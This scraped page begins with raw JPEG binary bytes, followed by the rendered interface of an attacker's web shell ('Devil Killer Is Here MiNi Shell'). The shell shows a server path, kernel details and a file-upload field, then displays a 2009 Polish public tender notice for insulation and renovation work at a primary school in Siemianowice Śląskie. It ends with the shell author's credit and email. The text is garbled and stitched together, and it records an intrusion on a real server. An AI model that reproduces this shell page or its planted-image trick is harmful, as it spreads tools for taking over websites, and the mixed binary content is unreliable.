JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090605/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090605/181666-N-2009.html

<p class="kh_header"><b>Siemianowice Śląskie: Wykonanie robót ociepleniowych i remontowych budynku Szkoły Podstawowej nr 5
im. Adama Mickiewicza w Siemianowicach Śląskich</b><br>
<b>Numer ogłoszenia: 181666 - 2009; data zamieszczenia: 05.06.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa Nr 5 im. Adama Mickiewicza , ul. Michałkowicka 15, 41-100 Siemianowice Śląskie, woj. śląskie, tel. 032 2200701, faks 032 2200699.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sp5siemianowice.republika.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: szkoła podstawowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót ociepleniowych i remontowych budynku Szkoły Podstawowej nr 5
im. Adama Mickiewicza w Siemianowicach Śląskich.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.   Zakres prac podział według wspólnego słownika zamówień CPV:

            Bezspoinowe systemy ocieplenia budynku (CPV - 45450000 -6 )
              Tynkowanie (CPV- 45410000)
              Roboty murarskie (CPV 45262522 -6 )
             Roboty malarskie( CPV 45442100-8)
             Rusztowania robocze składane z rur stalowych(CPV 45262120-8)
             Stolarka ( CPV 45421100-5)
             Roboty izolacyjne ( CPV 45453100-8)
             Roboty w zakresie nawierzchni z kostki brukowej (CPV 45233250-6)

                                                                                              
2. Przedmiotem zamówienia są :
              
Roboty budowlane i remontowe związane z ociepleniem elewacji południowej , wschodnieji zachodniej budynku głównego Szkoły Podstawowej nr 5 w Siemianowicach Śl. przy ul.  Michałkowickiej 15,  polegające na wykonaniu robót :

-ociepleniowych z zastosowaniem  bezspoinowego  systemu ocieplenia budynku 
 -  blacharskich 
 -tynkarskich zewnętrznych i wewnętrznych 
 -murarskich
 -malarskich
 -montażu i demontażu  rusztowania  z rur stalowych
 -wymianie  stolarki na strychu budynku
 -izolacyjnych 
 -ciesielskich
 - ziemnych
 - renowacyjnych -cokołu  z kamienia
 -w zakresie nawierzchni z kostki brukowej
3. Szczegółowy opis przedmiotu zamówienia , w tym materiały jakie należy zastosować  przy realizacji zamówienia zostały określone w : 
  3.1 Dokumentacji Projektowej,
  3.2 Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych,
  3.3 Przedmiarze Robót opracowanym przez Zamawiającego  stanowiącymi załączniki  do Specyfikacji Istotnych Warunków zamówienia - określanej w dalszej części niniejszego dokumentu skrótem SIWZ.
4. W przypadku, gdy Wykonawca zaproponuje materiał budowlany inny niż wskazany przez Zamawiającego ( równoważny) , zobowiązany jest ( w celach porównawczych) dołączyć  do oferty dokumentację , w której w szczególności zawarte będą dane techniczne proponowanego wyrobu budowlanego. Zamawiający zastrzega, że zaproponowany wyrób budowlany równoważny nie może posiadać parametrów technicznych ( jakościowych) gorszych , niż wymagane przez zamawiającego w Specyfikacji Istotnych Warunków Zamówienia . Komisja Przetargowa powołana do przeprowadzenia niniejszego postępowania , na podstawie w.w dokumentów dokona oceny równoważności 
proponowanych w ofercie materiałów  z materiałami wskazanymi w SIWZ.
5. W przypadku, gdy Wykonawca w kosztorysie ofertowym przedstawi materiał budowlany bez określenia parametrów technicznych i/lub nazwy handlowej i/lub nazwy producenta, odpowiednio do określenia robót budowlanych dokonanego przez Zamawiającego w Przedmiarze Robót oraz Specyfikacji Technicznej wykonania i odbioru robót  Zamawiający przyjmie , że Wykonawca zastosuje wyrób budowlany stosownie do opisów zawartych w Przedmiarze Robót, Specyfikacji Technicznej Wykonania i Odbioru Robót .
    
6. Na roboty będące przedmiotem zamówienia ustala się okres gwarancji, który wynosi  60 miesięcy . Bieg gwarancji dla całego przedmiotu zamówienia rozpoczyna się w dniu  następnym, licząc od daty odbioru końcowego robót.       
7. Począwszy od miesiąca września, gdy ewentualnie prace prowadzone będą na czynnym budynku ( od 7.00 do 15.00 będą odbywać się zajęcia lekcyjne przez 5 dni w tygodniu od poniedziałku do piątku w całym budynku szkoły ), wykonawca obowiązany jest zapewnić taką organizację robót , aby umożliwić korzystanie z korytarzy, pomieszczeń bez zakłóceń 
     m.in.:
 - w czasie realizacji robót w budynku szkoły należy oddzielić je od pozostałej części szkoły folią w celu zabezpieczenia przed zapyleniem i dostępem uczniów
 -  zapewnić porządek na klatce schodowej i korytarzach ,w trakcie i po wykonaniu robót,   należy sprzątać korytarze
- dostarczyć kontener na materiały pochodzące z rozbiórek, np. gruz
-  zapewnić bezpieczeństwo dla pracowników , uczniów i osób trzecich remontowanego budynku oraz wokół budynku
-  wykonawca będzie odpowiedzialny za szkody , spowodowane przez jego 
 działanie lub działanie zewnętrzne z powodu złego zabezpieczenia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.45.00.00-6, 45.41.00.00-4, 45.26.25.22-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 75.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawca musi spełniać wymagania określone w art. 22 ust.1 ustawy prawo zamówień publicznych z dn. 29 stycznia 2004 r. ( Dz. U. 2007 r.  Nr 223, poz. 1655 z  późn. zm)., tj.:
	
 1.  Posiadać  uprawnienia do wykonywania określonej działalności lub                   
      czynności, jeśli ustawy nakładają obowiązek posiadania takich uprawnień.
 2.  Posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem 
     technicznym i osobami  zdolnymi do wykonania zamówienia lub przedstawić    
     pisemne zobowiązanie innych podmiotów do udostępniania potencjału 
     technicznego i osób zdolnych do wykonania zamówienia tj.
 2.1  wykazać , że wykonał w okresie ostatnich pięciu lat - a jeżeli okres   
      prowadzenia działalności jest krótszy w tym okresie - co najmniej 2 
     roboty budowlane,  w tym co najmniej jednej polegającej na bezspinowym 
      systemie  ocieplenia budynku o wartości co najmniej 150.000 PLN
 2.2 Wykazać, że dysponuje osobą Kierownika budowy - posiadającą kwalifikacje 
       zawodowe uprawniające do kierowania robotami budowlanymi.
3. Znajdować  się w sytuacji ekonomicznej i finansowej zapewniającej  
    wykonanie zamówienia tj. Wykonawca musi posiadać ubezpieczenie od 
     odpowiedzialności cywilnej w zakresie prowadzonej działalności  na kwotę co 
     najmniej 150.000 PLN
4. Nie podlegać wykluczeniu z postępowania o udzielenie zamówienia.      
           





Opis sposobu dokonywania oceny spełniania w /w warunków  udziału w postępowaniu
-Ocena spełniania warunków udziału w postępowaniu nastąpi na podstawie 
   wymienionych w pkt VI dokumentów i oświadczeń złożonych przez wykonawcę    
    wraz z ofertą,
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ( np.  konsorcjum ) muszą dostarczyć wymagane przez zamawiającego dokumenty, potwierdzające , że :

a.łącznie spełniają warunki o których mowa w art. 22. ust.1 pkt 1, 2, 3 ustawy Prawo    Zamówień Publicznych ( pkt 1 , 2, 3 powyżej)
b.każdy spełnia warunek , o którym mowa w art. 22 ust.1 pkt 4 ustawy Prawo zamówień Publicznych ( pkt.4 powyżej)
 -Oświadczenia i dokumenty będą oceniane pod względem formalno-prawnym ,
   pod względem ich aktualności i treści , a także , czy informacje w nich zawarte   
    potwierdzają spełnienie wymagań zamawiającego
- Sposób oceny spełniania warunków wymaganych od wykonawców będzie zgodny   z formułą  spełnia  / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1 .  Wykonawcy muszą dostarczyć następujące dokumenty:
1.1. Formularz ofertowy  - (dodatek nr 1 do SIWZ).
1.2. Oświadczenie o spełnianiu warunków określonych w art. 22 ust.1   ustawy  Prawo  zamówień  publicznych - (dodatek nr 2 do SIWZ , załącznik nr 1 do     Oferty).
1.3. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji   działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu 
do rejestru lub zgłoszenia do ewidencji działalności gospodarczej , wystawione       
nie wcześniej niż 6 miesięcy  przed upływem  terminu składania ofert - ( załącznik 
 nr 2 do oferty).
1.4. Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz 
właściwego  oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego          Ubezpieczenia   Społecznego potwierdzające odpowiednio, że wykonawca nie 
zalega z opłacaniem  podatków, opłat oraz składek na ubezpieczenie zdrowotne 
i społeczne, lub zaświadczeń,  że uzyskał przewidziane prawem zwolnienie , 
odroczenie lub rozłożenie na  raty zaległych płatności lub wstrzymanie w całości  
wykonania decyzji właściwego organu   - wystawione  nie wcześniej niż 3 
miesiące przed upływem terminu składania ofert  - (załącznik nr3                         i   4 do oferty ).
1.5. Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed     dniem  wszczęcia postępowania o udzielenie zamówienia , a jeżeli okres prowadzenia  działalności  jest krótszy - w tym okresie, co najmniej 2 roboty      
budowlane,  w tym co najmniej jednej polegającej na bezspinowym systemie   
ocieplenia  budynku o wartości co najmniej 150.000 PLN (dodatek nr 3 do SIWZ, 
załącznik nr 5 do oferty).
1.6. Dokumenty stwierdzające, że roboty te zostały wykonane należycie - 
(załącznik nr 6 do oferty) .
1.7.  Polisa , a w przypadku jej braku inny dokument potwierdzający , że 
wykonawca jest  ubezpieczony od odpowiedzialności cywilnej w zakresie 
prowadzonej działalności tj. posiada ubezpieczenie od odpowiedzialności cywilnej    w zakresie prowadzonej działalności na   kwotę co najmniej 150.000 PLN
 (załącznik  nr 7 do oferty).
1.8 Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które 
będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich        kwalifikacji zawodowych niezbędnych do wykonania zamówienia a także zakresu 
wykonywanych przez nich czynności tj.
  - uprawnienia do kierowania robotami budowlanymi, wydane na podstawie 
    Ustawy z 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2006 nr 156 poz.1118 
    z późn. zm.) lub odpowiadające im ważne uprawniania, które zostały wydane na 
    podstawie wcześniej obowiązujących przepisów,
- zaświadczeniem o aktualnej przynależności do właściwej Okręgowej Izby 
    Samorządu Zawodowego (dodatek nr 4 do SIWZ i załącznik nr 8 do oferty)
1.9 Dokumenty stwierdzające, że osoby które będą uczestniczyć w wykonaniu  
zamówienia , posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek  
 posiadania takich uprawnień tj. pracownicy nadzoru budowlanego, w szczególności 
 kierownik budowy (załącznik nr 11 do oferty).
2.Jeśli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium    
      Rzeczypospolitej Polskiej, zamiast dokumentów , o których mowa w pkt :
 - 1.3., 1.4. składa dokument lub dokumenty wystawione w kraju, w którym ma    
     siedzibę lub miejsce zamieszkania, potwierdzające , że :
 2.1 Nie otwarto jego likwidacji ani nie ogłoszono upadłości 
 2.2 Nie zalega z uiszczeniem podatków  , opłat lub składek na ubezpieczenie 
   społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, 
   odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie 
  w całości decyzji właściwego organu.
3. Jeżeli w kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania , nie wydaje się  dokumentów, o których mowa w punkcie 2 , zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem,  właściwym organem sadowym,  administracyjnym albo organem samorządu  zawodowego lub gospodarczego  odpowiednio kraju pochodzenia osoby lub kraju,  w którym wykonawca ma siedzibę lub miejsce  zamieszkania .
4. Dokumenty składane są w formie oryginału lub kopii poświadczonej za zgodność
    z oryginałem przez Wykonawcę.
5. W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści złożonych ofert. Niedopuszczalne jest  prowadzenie między Zamawiającym a Wykonawcą negocjacji dotyczących złożonej oferty oraz , 
z  zastrzeżeniem pkt 6, dokonywanie jakiejkolwiek zmiany w jej treści.
6.Zamawiający  poprawia w tekście oferty oczywiste omyłki pisarskie oraz oczywiste omyłki rachunkowe w obliczeniu ceny, z uwzględnieniem konsekwencji rachunkowych dokonanych poprawek oraz inne omyłki polegające na niezgodności oferty ze specyfikacją istotnych warunków zamówienia , nie powodujące istotnych zmian w treści oferty ,  niezwłocznie zawiadamiając  o tym Wykonawcę, którego oferta została poprawiona.
7.Zamawiający wzywa Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez Zamawiającego oświadczeń lub dokumentów, o których mowa  w art.25 ust.1 ustawy Prawo Zamówień Publicznych lub , którzy nie złożyli   
pełnomocnictw albo , którzy złożyli wymagane przez Zamawiającego oświadczenia 
 i dokumenty , o których mowa w art. 25.ust.1 ustawy Prawo Zamówień Publicznych  zawierające błędy lub , którzy złożyli wadliwe pełnomocnictwa , do ich złożenia w wyznaczonym terminie , chyba, że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na 
wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać 
spełnianie przez Wykonawcę warunków udziału w postępowaniu  oraz spełnianie 
przez oferowane roboty budowlane wymagań określonych przez Zamawiającego, nie później niż w dniu , w którym upłynął termin składania wniosków o dopuszczenie do udziału w postępowaniu albo termin składania ofert.
8.Zamawiający wzywa także , w wyznaczonym przez siebie terminie, do złożenia wyjaśnień dotyczących oświadczeń lub dokumentów, o których mowa w art. 25 
 ust. 1 ustawy Prawo Zamówień Publicznych..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.sp5siemianowice.republika.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Podstawowa nr 5
im. Adama Mickiewicza
ul. Michałkowicka 15
41-100 Siemianowice Śląskie.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.06.2009 godzina 09:30, miejsce: Szkoła Podstawowa nr 5
im. Adama Mickiewicza
ul. Michałkowicka 15
41-100 Siemianowice Śląskie
sekretariat, parter.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com